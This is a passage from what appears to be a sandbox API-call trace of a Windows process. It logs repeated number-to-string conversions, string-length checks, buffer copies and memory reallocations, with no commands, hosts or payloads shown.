(_Str="672336", _MaxCount=0x18) returned 0x6 [0232.269] _i64toa_s (in: _Value=5796, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="16a4") returned 0x0 [0232.270] strnlen (_Str="16A4", _MaxCount=0x18) returned 0x4 [0232.270] _i64toa_s (in: _Value=350320, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="350320") returned 0x0 [0232.270] strnlen (_Str="350320", _MaxCount=0x18) returned 0x6 [0232.270] _i64toa_s (in: _Value=3020, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="bcc") returned 0x0 [0232.270] strnlen (_Str="BCC", _MaxCount=0x18) returned 0x3 [0232.270] _i64toa_s (in: _Value=15792, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="15792") returned 0x0 [0232.270] strnlen (_Str="15792", _MaxCount=0x18) returned 0x5 [0232.270] _i64toa_s (in: _Value=141, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="8d") returned 0x0 [0232.270] strnlen (_Str="8D", _MaxCount=0x18) returned 0x2 [0232.270] _i64toa_s (in: _Value=936790, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="936790") returned 0x0 [0232.270] strnlen (_Str="936790", _MaxCount=0x18) returned 0x6 [0232.270] _i64toa_s (in: _Value=8146, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1fd2") returned 0x0 [0232.270] strnlen (_Str="1FD2", _MaxCount=0x18) returned 0x4 [0232.270] _i64toa_s (in: _Value=26390, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="26390") returned 0x0 [0232.270] strnlen (_Str="26390", _MaxCount=0x18) returned 0x5 [0232.270] _i64toa_s (in: _Value=455, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1c7") returned 0x0 [0232.270] strnlen (_Str="1C7", _MaxCount=0x18) returned 0x3 [0232.270] _i64toa_s (in: _Value=405469, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="405469") returned 0x0 [0232.270] strnlen (_Str="405469", _MaxCount=0x18) returned 0x6 [0232.270] _i64toa_s (in: _Value=8627, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="21b3") returned 0x0 [0232.270] strnlen (_Str="21B3", _MaxCount=0x18) returned 0x4 [0232.270] _i64toa_s (in: _Value=175592, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="175592") returned 0x0 [0232.270] strnlen (_Str="175592", _MaxCount=0x18) returned 0x6 [0232.270] _i64toa_s (in: _Value=3736, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="e98") returned 0x0 [0232.270] strnlen (_Str="E98", _MaxCount=0x18) returned 0x3 [0232.270] _i64toa_s (in: _Value=8596, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="8596") returned 0x0 [0232.270] strnlen (_Str="8596", _MaxCount=0x18) returned 0x4 [0232.270] _i64toa_s (in: _Value=8715, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="220b") returned 0x0 [0232.270] strnlen (_Str="220B", _MaxCount=0x18) returned 0x4 [0232.270] _i64toa_s (in: _Value=1130143, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="1130143") returned 0x0 [0232.270] strnlen (_Str="1130143", _MaxCount=0x18) returned 0x7 [0232.270] _i64toa_s (in: _Value=9497, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="2519") returned 0x0 [0232.271] strnlen (_Str="2519", _MaxCount=0x18) returned 0x4 [0232.271] _i64toa_s (in: _Value=624750, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="624750") returned 0x0 [0232.271] strnlen (_Str="624750", _MaxCount=0x18) returned 0x6 [0232.271] _i64toa_s (in: _Value=5250, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1482") returned 0x0 [0232.271] strnlen (_Str="1482", _MaxCount=0x18) returned 0x4 [0232.271] _i64toa_s (in: _Value=24656, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="24656") returned 0x0 [0232.271] strnlen (_Str="24656", _MaxCount=0x18) returned 0x5 [0232.271] _i64toa_s (in: _Value=536, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="218") returned 0x0 [0232.271] strnlen (_Str="218", _MaxCount=0x18) returned 0x3 [0232.271] _i64toa_s (in: _Value=534432, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="534432") returned 0x0 [0232.271] strnlen (_Str="534432", _MaxCount=0x18) returned 0x6 [0232.271] _i64toa_s (in: _Value=4688, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1250") returned 0x0 [0232.271] strnlen (_Str="1250", _MaxCount=0x18) returned 0x4 [0232.271] _i64toa_s (in: _Value=604116, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="604116") returned 0x0 [0232.271] strnlen (_Str="604116", _MaxCount=0x18) returned 0x6 [0232.271] _i64toa_s (in: _Value=6228, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1854") returned 0x0 [0232.271] strnlen (_Str="1854", _MaxCount=0x18) returned 0x4 [0232.271] _i64toa_s (in: _Value=258622, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="258622") returned 0x0 [0232.271] strnlen (_Str="258622", _MaxCount=0x18) returned 0x6 [0232.271] _i64toa_s (in: _Value=2639, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="a4f") returned 0x0 [0232.271] strnlen (_Str="A4F", _MaxCount=0x18) returned 0x3 [0232.271] _i64toa_s (in: _Value=805003, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="805003") returned 0x0 [0232.271] strnlen (_Str="805003", _MaxCount=0x18) returned 0x6 [0232.271] _i64toa_s (in: _Value=8299, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="206b") returned 0x0 [0232.271] strnlen (_Str="206B", _MaxCount=0x18) returned 0x4 [0232.271] _i64toa_s (in: _Value=589300, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="589300") returned 0x0 [0232.271] strnlen (_Str="589300", _MaxCount=0x18) returned 0x6 [0232.271] _i64toa_s (in: _Value=5893, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1705") returned 0x0 [0232.271] strnlen (_Str="1705", _MaxCount=0x18) returned 0x4 [0232.271] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d8545a0, cb=0x1000) returned 0x1d39d8545a0 [0232.271] _i64toa_s (in: _Value=9014, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="9014") returned 0x0 [0232.272] strnlen (_Str="9014", _MaxCount=0x18) returned 0x4 [0232.272] _i64toa_s (in: _Value=9111, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="2397") returned 0x0 [0232.272] strnlen (_Str="2397", _MaxCount=0x18) returned 0x4 [0232.272] _i64toa_s (in: _Value=813384, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="813384") returned 0x0 [0232.272] strnlen (_Str="813384", _MaxCount=0x18) returned 0x6 [0232.272] _i64toa_s (in: _Value=6952, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1b28") returned 0x0 [0232.272] strnlen (_Str="1B28", _MaxCount=0x18) returned 0x4 [0232.272] _i64toa_s (in: _Value=268400, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="268400") returned 0x0 [0232.272] strnlen (_Str="268400", _MaxCount=0x18) returned 0x6 [0232.272] _i64toa_s (in: _Value=2440, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="988") returned 0x0 [0232.272] strnlen (_Str="988", _MaxCount=0x18) returned 0x3 [0232.272] _i64toa_s (in: _Value=48990, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="48990") returned 0x0 [0232.272] strnlen (_Str="48990", _MaxCount=0x18) returned 0x5 [0232.272] _i64toa_s (in: _Value=1065, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="429") returned 0x0 [0232.272] strnlen (_Str="429", _MaxCount=0x18) returned 0x3 [0232.272] _i64toa_s (in: _Value=6664, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="6664") returned 0x0 [0232.272] strnlen (_Str="6664", _MaxCount=0x18) returned 0x4 [0232.272] _i64toa_s (in: _Value=6763, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1a6b") returned 0x0 [0232.272] strnlen (_Str="1A6B", _MaxCount=0x18) returned 0x4 [0232.272] _i64toa_s (in: _Value=5642, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="5642") returned 0x0 [0232.272] strnlen (_Str="5642", _MaxCount=0x18) returned 0x4 [0232.272] _i64toa_s (in: _Value=5753, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1679") returned 0x0 [0232.272] strnlen (_Str="1679", _MaxCount=0x18) returned 0x4 [0232.272] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d8545a0, cb=0x1400) returned 0x1d3a411bb70 [0232.272] _i64toa_s (in: _Value=112379, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="112379") returned 0x0 [0232.272] strnlen (_Str="112379", _MaxCount=0x18) returned 0x6 [0232.272] _i64toa_s (in: _Value=1031, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="407") returned 0x0 [0232.272] strnlen (_Str="407", _MaxCount=0x18) returned 0x3 [0232.272] _i64toa_s (in: _Value=2799, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="2799") returned 0x0 [0232.272] strnlen (_Str="2799", _MaxCount=0x18) returned 0x4 [0232.272] _i64toa_s (in: _Value=2846, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="b1e") returned 0x0 [0232.273] strnlen (_Str="B1E", _MaxCount=0x18) returned 0x3 [0232.273] _i64toa_s (in: _Value=352121, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="352121") returned 0x0 [0232.273] strnlen (_Str="352121", _MaxCount=0x18) returned 0x6 [0232.273] _i64toa_s (in: _Value=2959, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="b8f") returned 0x0 [0232.273] strnlen (_Str="B8F", _MaxCount=0x18) returned 0x3 [0232.273] _i64toa_s (in: _Value=334221, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="334221") returned 0x0 [0232.273] strnlen (_Str="334221", _MaxCount=0x18) returned 0x6 [0232.273] _i64toa_s (in: _Value=3011, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="bc3") returned 0x0 [0232.273] strnlen (_Str="BC3", _MaxCount=0x18) returned 0x3 [0232.273] _i64toa_s (in: _Value=1117086, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="1117086") returned 0x0 [0232.273] strnlen (_Str="1117086", _MaxCount=0x18) returned 0x7 [0232.273] _i64toa_s (in: _Value=9799, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="2647") returned 0x0 [0232.273] strnlen (_Str="2647", _MaxCount=0x18) returned 0x4 [0232.273] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d3a411bb70, cb=0x1800) returned 0x1d39df10720 [0232.273] _i64toa_s (in: _Value=2684, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="2684") returned 0x0 [0232.273] strnlen (_Str="2684", _MaxCount=0x18) returned 0x4 [0232.273] _i64toa_s (in: _Value=2784, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="ae0") returned 0x0 [0232.273] strnlen (_Str="AE0", _MaxCount=0x18) returned 0x3 [0232.273] _i64toa_s (in: _Value=182448, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="182448") returned 0x0 [0232.273] strnlen (_Str="182448", _MaxCount=0x18) returned 0x6 [0232.273] _i64toa_s (in: _Value=1629, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="65d") returned 0x0 [0232.273] strnlen (_Str="65D", _MaxCount=0x18) returned 0x3 [0232.273] _i64toa_s (in: _Value=467628, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="467628") returned 0x0 [0232.273] strnlen (_Str="467628", _MaxCount=0x18) returned 0x6 [0232.273] _i64toa_s (in: _Value=4102, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1006") returned 0x0 [0232.273] strnlen (_Str="1006", _MaxCount=0x18) returned 0x4 [0232.273] _i64toa_s (in: _Value=719928, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="719928") returned 0x0 [0232.273] strnlen (_Str="719928", _MaxCount=0x18) returned 0x6 [0232.273] _i64toa_s (in: _Value=7128, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1bd8") returned 0x0 [0232.273] strnlen (_Str="1BD8", _MaxCount=0x18) returned 0x4 [0232.273] _i64toa_s (in: _Value=6218, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="6218") returned 0x0 [0232.274] strnlen (_Str="6218", _MaxCount=0x18) returned 0x4 [0232.274] _i64toa_s (in: _Value=6333, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="18bd") returned 0x0 [0232.274] strnlen (_Str="18BD", _MaxCount=0x18) returned 0x4 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e5e | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _mbscpy_s (in: _Dst=0x1d3986a09d0, _DstSizeInBytes=0x400, _Src=0x1d3a3172e3a | out: _Dst=0x1d3986a09d0) returned 0x0 [0232.274] _i64toa_s (in: _Value=214015, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="214015") returned 0x0 [0232.274] strnlen (_Str="214015", _MaxCount=0x18) returned 0x6 [0232.274] _i64toa_s (in: _Value=1861, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="745") returned 0x0 [0232.275] strnlen (_Str="745", _MaxCount=0x18) returned 0x3 [0232.275] _i64toa_s (in: _Value=37976, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="37976") returned 0x0 [0232.275] strnlen (_Str="37976", _MaxCount=0x18) returned 0x5 [0232.275] _i64toa_s (in: _Value=808, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="328") returned 0x0 [0232.275] strnlen (_Str="328", _MaxCount=0x18) returned 0x3 [0232.275] _i64toa_s (in: _Value=1077902, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="1077902") returned 0x0 [0232.275] strnlen (_Str="1077902", _MaxCount=0x18) returned 0x7 [0232.275] _i64toa_s (in: _Value=9058, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="2362") returned 0x0 [0232.275] strnlen (_Str="2362", _MaxCount=0x18) returned 0x4 [0232.275] _i64toa_s (in: _Value=879536, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="879536") returned 0x0 [0232.275] strnlen (_Str="879536", _MaxCount=0x18) returned 0x6 [0232.275] _i64toa_s (in: _Value=7853, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1ead") returned 0x0 [0232.275] strnlen (_Str="1EAD", _MaxCount=0x18) returned 0x4 [0232.275] _i64toa_s (in: _Value=130410, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="130410") returned 0x0 [0232.275] strnlen (_Str="130410", _MaxCount=0x18) returned 0x6 [0232.275] _i64toa_s (in: _Value=2898, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="b52") returned 0x0 [0232.275] strnlen (_Str="B52", _MaxCount=0x18) returned 0x3 [0232.275] _i64toa_s (in: _Value=625482, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="625482") returned 0x0 [0232.275] strnlen (_Str="625482", _MaxCount=0x18) returned 0x6 [0232.275] _i64toa_s (in: _Value=6318, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="18ae") returned 0x0 [0232.275] strnlen (_Str="18AE", _MaxCount=0x18) returned 0x4 [0232.275] _i64toa_s (in: _Value=4175, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="4175") returned 0x0 [0232.275] strnlen (_Str="4175", _MaxCount=0x18) returned 0x4 [0232.275] _i64toa_s (in: _Value=4286, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="10be") returned 0x0 [0232.275] strnlen (_Str="10BE", _MaxCount=0x18) returned 0x4 [0232.275] _i64toa_s (in: _Value=617210, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="617210") returned 0x0 [0232.275] strnlen (_Str="617210", _MaxCount=0x18) returned 0x6 [0232.275] _i64toa_s (in: _Value=5611, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="15eb") returned 0x0 [0232.275] strnlen (_Str="15EB", _MaxCount=0x18) returned 0x4 [0232.275] _i64toa_s (in: _Value=1060008, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="1060008") returned 0x0 [0232.275] strnlen (_Str="1060008", _MaxCount=0x18) returned 0x7 [0232.276] _i64toa_s (in: _Value=9138, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="23b2") returned 0x0 [0232.276] strnlen (_Str="23B2", _MaxCount=0x18) returned 0x4 [0232.276] _i64toa_s (in: _Value=22927, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="22927") returned 0x0 [0232.276] strnlen (_Str="22927", _MaxCount=0x18) returned 0x5 [0232.276] _i64toa_s (in: _Value=227, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="e3") returned 0x0 [0232.276] strnlen (_Str="E3", _MaxCount=0x18) returned 0x2 [0232.276] _i64toa_s (in: _Value=1007930, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="1007930") returned 0x0 [0232.276] strnlen (_Str="1007930", _MaxCount=0x18) returned 0x7 [0232.276] _i64toa_s (in: _Value=9163, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="23cb") returned 0x0 [0232.276] strnlen (_Str="23CB", _MaxCount=0x18) returned 0x4 [0232.276] _i64toa_s (in: _Value=786480, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="786480") returned 0x0 [0232.276] strnlen (_Str="786480", _MaxCount=0x18) returned 0x6 [0232.276] _i64toa_s (in: _Value=6780, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1a7c") returned 0x0 [0232.276] strnlen (_Str="1A7C", _MaxCount=0x18) returned 0x4 [0232.276] _i64toa_s (in: _Value=241486, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="241486") returned 0x0 [0232.276] strnlen (_Str="241486", _MaxCount=0x18) returned 0x6 [0232.276] _i64toa_s (in: _Value=5138, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="1412") returned 0x0 [0232.276] strnlen (_Str="1412", _MaxCount=0x18) returned 0x4 [0232.276] _i64toa_s (in: _Value=410176, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="410176") returned 0x0 [0232.276] strnlen (_Str="410176", _MaxCount=0x18) returned 0x6 [0232.276] _i64toa_s (in: _Value=3536, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="dd0") returned 0x0 [0232.276] strnlen (_Str="DD0", _MaxCount=0x18) returned 0x3 [0232.276] _i64toa_s (in: _Value=2594, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="2594") returned 0x0 [0232.276] strnlen (_Str="2594", _MaxCount=0x18) returned 0x4 [0232.276] _i64toa_s (in: _Value=2698, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="a8a") returned 0x0 [0232.276] strnlen (_Str="A8A", _MaxCount=0x18) returned 0x3 [0232.276] _i64toa_s (in: _Value=246339, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="246339") returned 0x0 [0232.276] strnlen (_Str="246339", _MaxCount=0x18) returned 0x6 [0232.276] _i64toa_s (in: _Value=2439, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="987") returned 0x0 [0232.276] strnlen (_Str="987", _MaxCount=0x18) returned 0x3 [0232.276] _i64toa_s (in: _Value=66490, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="66490") returned 0x0 [0232.277] strnlen (_Str="66490", _MaxCount=0x18) returned 0x5 [0232.277] _i64toa_s (in: _Value=610, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="262") returned 0x0 [0232.277] strnlen (_Str="262", _MaxCount=0x18) returned 0x3 [0232.277] _i64toa_s (in: _Value=368751, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="368751") returned 0x0 [0232.277] strnlen (_Str="368751", _MaxCount=0x18) returned 0x6 [0232.277] _i64toa_s (in: _Value=3651, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="e43") returned 0x0 [0232.277] strnlen (_Str="E43", _MaxCount=0x18) returned 0x3 [0232.277] _i64toa_s (in: _Value=179170, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="179170") returned 0x0 [0232.277] strnlen (_Str="179170", _MaxCount=0x18) returned 0x6 [0232.277] _i64toa_s (in: _Value=1558, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="616") returned 0x0 [0232.277] strnlen (_Str="616", _MaxCount=0x18) returned 0x3 [0232.277] _i64toa_s (in: _Value=120978, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | out: _Buffer="120978") returned 0x0 [0232.277] strnlen (_Str="120978", _MaxCount=0x18) returned 0x6 [0232.277] _i64toa_s (in: _Value=2574, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=16 | out: _Buffer="a0e") returned 0x0 [0232.277] strnlen (_Str="A0E", _MaxCount=0x18) returned 0x3 [0232.277] _i64toa_s (in: _Value=5338, _Buffer=0x33e4fb03b0, _BufferCount=0x18, _Radix=10 | 